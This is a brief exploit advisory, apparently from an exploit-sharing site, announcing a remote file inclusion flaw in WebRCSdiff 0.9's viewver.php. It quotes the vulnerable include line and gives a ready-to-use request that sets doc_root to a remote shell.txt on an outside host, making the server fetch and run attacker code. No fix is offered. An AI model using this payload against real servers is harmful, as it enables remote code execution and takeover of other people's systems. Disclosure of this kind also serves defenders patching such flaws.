WebRCSdiff 0.9 (viewver.php) Remote File Inclusion Vulnerability

2010-11-18 15:15:09

========================================================
= Author: Fl0riX - Bug Researchers

= Application Name : WebRCSdiff 0.9

= Vulnerable Type: Remote File Inclusion

= Download: http://sourceforge.net/projects/webrcsdiff/files/webrcsdiff/0.9%20Release/webrcsdiff-0.9.tar.zip/download

= Risk : High

= Infection: Uzaktan Dosya Dahil edilebilir.

========================================================

=
Error c0d3;
include ("$doc_root/dir_config.php");

========================================================

=
Example;
site/viewver?doc_root=http://fl0rix/shell.txt?
========================================================

Fixes

No fixes

In order to submit a new fix you need to be registered.